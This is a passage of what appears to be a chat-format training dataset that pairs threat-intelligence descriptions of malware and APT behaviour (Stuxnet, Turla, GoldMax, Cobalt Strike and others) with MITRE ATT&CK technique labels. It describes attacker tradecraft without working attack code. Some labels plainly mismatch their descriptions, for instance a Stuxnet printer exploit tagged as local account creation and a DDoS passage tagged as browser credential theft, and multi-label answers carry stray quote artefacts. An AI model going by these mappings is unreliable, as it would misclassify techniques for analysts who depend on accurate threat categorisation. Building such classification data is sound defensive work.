enumerated running processes on a compromised host to determine if it is running under the process name `dfrgui.exe`." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "From October 2012 to May 2014, FireEye observed APT12 utilizing RIPTIDE, a proxy-aware backdoor that communicates via HTTP to a hard-coded command and control (C2) server. RIPTIDE’s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication" }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At this point in the execution cycle, the FoggyWeb DLL is loaded into one or more application domains where the legitimate AD FS code is running. This means the backdoor code runs alongside the AD FS code with the same access and permissions as the AD FS application. Such access allows the FoggyWeb backdoor to directly interact with the AD FS codebase (that is, not an external disk-resident tool) and selectively invoke native AD FS methods needed to facilitate its malicious operations" }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Magic Hound has compromised email credentials in order to steal sensitive data." }, { "role": "assistant", "content": "T1114 - Email Collection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Felismus has masqueraded as legitimate Adobe Content Management System files." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Okrum can establish persistence by adding a new service NtmsSvc with the display name Removable Storage to masquerade as a legitimate Removable Storage Manager." }, { "role": "assistant", "content": "T1036.004 - Masquerading: Masquerade Task or Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QuasarRAT has a command to edit the Registry on the victim’s machine." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects a list of available servers with the command \"net view\"." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used DLL side-loading to load malicious payloads." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "searches for interesting files (either a default or customized set of file extensions) on the local system and removable media." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SPLM, otherwise known as CHOPSTICK, or by the author(s) as “XAgent”, is described as Sofacy’s signature second stage tool, selectively used for years against around the world. Really, many modified XAgent modules have been deployed over the years. Even the individual Linux modules renamed as “Fysbis” backdoors released in 2016 were merely modified and reduced portions of recompiled XAgent C/C++ codebase. Anyway, SPLM/CHOPSTICK has maintained various combinations of code, with some recognizable functionality listed here." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has created scheduled tasks to maintain Machete's persistence." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Avenger can extract backdoor malware from downloaded images." }, { "role": "assistant", "content": "T1027.003 - Steganography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Stuxnet extracts and writes driver files that match the times of other legitimate files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used a global service provider's IP as a proxy for C2 traffic from a victim." }, { "role": "assistant", "content": "T1090 - Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "37 38 zlib64.dll zlib32.dll Open source “zlib” version 1.2.3 used by libpngXX.dll for compressing screenshots (ssXX.dll)" }, { "role": "assistant", "content": "T1055 - Process Injection', 'T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kevin can generate a sequence of dummy HTTP C2 requests to obscure traffic." }, { "role": "assistant", "content": "T1001.001 - Junk Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has used ProxyBot, which allows the attacker to redirect traffic from the current node to the backconnect server via Sock4\\Socks5." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Donut can generate shellcode outputs that execute via Ruby." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "prompts the user for their credentials." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This DLL has no other noticeable characteristics, as it functions like a typical malicious sideload. After loading the encrypted payload in memory, it transfers the execution to a shellcode that is located at the beginning of the file. Once loaded in memory, the ZeroT shellcode does not present any kind of obfuscation, unlike that for PlugX. As in the new PlugX dropper detailed below, this is done using RC4 and RtlDecompressBuffer. As in PlugX samples, the PE header of ZeroT has been tampered with, specifically the “MZ” and “PE” constants (Fig" }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HiddenWasp adds itself to the LD_PRELOAD path and sets a series of environment variables." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 has a tool that can detect the existence of remote systems." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TEARDROP checked that \"HKU\\SOFTWARE\\Microsoft\\CTF\" existed before decoding its embedded payload." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lateral movement was done through Cobalt Strike. This tool was also used to distribute BAT files that will be used later for various purposes, including impairing the system’s defenses." }, { "role": "assistant", "content": "T1588.002 - Tool', 'T1562 - Impair Defenses', 'T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "checks for the presence of Bitdefender security software." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay can collect directory and file lists." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PoetRAT used TLS to encrypt communications over port 143" }, { "role": "assistant", "content": "T1571 - Non-Standard Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The APT actors forced BitLocker activation on host networks to encrypt data [T1486]. The corresponding threatening notes were either sent to the victim or left on the victim network as a .txt file. The ransom notes included ransom demands and the following contact information. sar_addr@protonmail[.]com WeAreHere@secmail[.]pro nosterrmann@mail[.]com nosterrmann@protonmail[.]com" }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has developed custom malware that allowed them to maintain persistence on victim networks." }, { "role": "assistant", "content": "T1587.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The NewsBeef APT previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. Previous analysis of the NewsBeef APT indicates that the group focuses on Saudi Arabian (SA) and Western targets, and lacks advanced offensive technology development capabilities." }, { "role": "assistant", "content": "T1593.001 - Social Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) The printer vulnerability MS10-061 exploited by Stuxnet – using a special MOF file, executed on the attacked system using WMI" }, { "role": "assistant", "content": "T1136.001 - Create Account: Local Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Transparent Tribe has sent spearphishing e-mails with attachments to deliver malicious payloads." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Upon execution, GoldMax retrieves a list of the system’s network interfaces; the malware terminates if it is unable to do so or no network interface is configured. It then attempts to determine if any of the network interfaces has the following hardcoded MAC address: c8:27:cc:c2:37:5a" }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:" }, { "role": "assistant", "content": "T1574.011 - Hijack Execution Flow: Services Registry Permissions Weakness" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Initially, cybercriminals used BlackEnergy custom plugins for launching DDoS attacks. While another crimeware group continues to use BlackEnergy to launch DDoS attacks, the BE2 APT appears to have used this tool exclusively throughout 2014 at victim sites and included custom plugins and scripts of their own. To be clear, our name for this actor has been the BE2 APT, while it has been called “Sandworm Team” also" }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a package that collects documents from any inserted USB sticks." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has used rundll32 to execute malicious payloads on a compromised host." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The majority of documents used the name “gerry knight” for the author field in the document metadata, and the embedded macros largely used direct IP connections to command and control (C2) servers rather than using domain names" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tropic Trooper has hidden payloads in Flash directories and fake installer files." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The victims Data from Cadelle’s C&C servers shows that a large number of Backdoor.Cadelspy infections affected individual users of Iranian internet service providers (ISPs) and hosting services" }, { "role": "assistant", "content": "T1543 - Create or Modify System Process', 'T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After applying this decryption algorithm, we are presented with the following data: h=HOSTNAME-PC&f=mission.ini&c=& The response made by the C2 server uses the same RC4 key for encryption" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla surveys a system upon check-in to discover information in the Windows Registry with the \"reg query\" command. Turla has also retrieved PowerShell payloads hidden in Registry keys as well as checking keys associated with null session named pipes ." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM has changed the creation date of files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes" }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1064 - Scripting', 'T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use spoof arguments in spawned processes that execute beacon commands." }, { "role": "assistant", "content": "T1564.010 - Process Argument Spoofing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After this registry change, ShowCompColor and ShowInfoTip keys are also modified to disable the display of compressed and encrypted NTFS files in color. This setting allows you to see compressed files in a blue color" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Its use of a PowerShell payload means that only legitimate system processes are utilized and that the malicious code execution can only be identified through enhanced logging or in memory" }, { "role": "assistant", "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth obfuscates its JScript code, and has used an XOR-based algorithm to encrypt payloads twice with different keys." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT accepts many possible commands that the C2 server can provide. These commands are sent as a response to the GET beacons that are continually requested via either HTTP or HTTPS. The following commands and sub-commands have been identified" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "With the file written to the system, the Trojan calls the \"GetishideAbById\" SOAP action to determine whether or not the C2 server wishes to execute the newly dropped file in a hidden window. This request is followed by a call to \"GetisrunasAbById\" to determine if the Trojan should use \"runas\" to execute the downloaded executable with elevated privileges, which would display the UAC dialog for the user to click" }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "An downloader establishes SOCKS5 connections for its initial C2." }, { "role": "assistant", "content": "T1090 - Proxy', 'T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling can wait 30 minutes before initiating contact with C2." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has leveraged iplogger.org to send collected data back to C2." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PLATINUM has used several different keyloggers." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OilRig has used net.exe in a script with \"net accounts /domain\" to find the password policy of a domain." }, { "role": "assistant", "content": "T1201 - Password Policy Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "XAgentOSX contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure." }, { "role": "assistant", "content": "T1056.001 - Input Capture: Keylogging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the ability to enumerate drive types." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Night Dragon is known to use software packing in its tools." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper can delete itself from the victim. Another variant has the capability to delete specified files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mouse position: Darkhotel repeatedly checks for the position of the mouse cursor on the screen. If the cursor remains at the center of the desktop, it is unlikely that a real user is using the system. Because of this, most sandboxes periodically move the mouse cursor or perform some other type of interaction with the desktop" }, { "role": "assistant", "content": "T1497.002 - User Activity Based Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malware uses the AMAP SDK to get accurate location of infected devices by GPS, mobile network (such as base stations), WiFi and other information. MobileOrder acts on instructions provided by its C2 server, which it communicates with over TCP port 3728. All C2 communications are encrypted with the AES algorithm using a key generated by computing five MD5 hashes starting with the key \"1qazxcvbnm\", and adding a salt value of “.)1/” in each iteration" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. MSGet — This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the ‘at' or ‘schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity" }, { "role": "assistant", "content": "T1053.002 - Scheduled Task/Job: At', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Attackers modified the Dll and FuncName Registry values in HKLM\\SOFTWARE[\\WOW6432Node]Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptSIPDllGetSignedDataMsg{SIP_GUID} that point to the dynamic link library (DLL) providing a SIP’s CryptSIPDllGetSignedDataMsg function, which retrieves an encoded digital certificate from a signed file." }, { "role": "assistant", "content": "T1553 - Subvert Trust Controls" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore will enumerate the macOS version to determine which follow-on behaviors to execute using \"/usr/bin/sw_vers -productVersion\"." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts C2 traffic with AES and RSA." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "VERMIN can download and upload files to the victim's machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clop can use msiexec.exe to disable security tools on the system." }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LookBack executes the \"cmd.exe\" command." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex can stop and disable services on the system." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHUTTERSPEED can capture screenshots." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This variant uses an 8-byte XOR key to obfuscate API names and other strings within the payload (Figure 5). Figure 5: 8-Byte XOR Key for obfuscation" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive" }, { "role": "assistant", "content": "T1119 - Automated Collection', 'T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Netwalker has been written in PowerShell and executed directly in memory, avoiding detection." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Observed GoldMax C2 domains are high-reputation and high-prevalence, often acquired from domain resellers so that Whois records retain the creation date from their previous registration, or domains that may have been compromised. This tactic complements NOBELIUM’s operational security strategy as these domains are more likely to be overlooked by security products and analysts based on their perceived long-lived domain ownership. Put simply, several domains we have shared as GoldMax C2 domains are only associated with NOBELIUM after the time they were re-sold or compromised – and Microsoft has provided that indicator context where it is available to us" }, { "role": "assistant", "content": "T1584.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ke3chang has used tools to download files to compromised machines." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LoudMiner used a script to gather the IP address of the infected machine before sending to the C2." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] 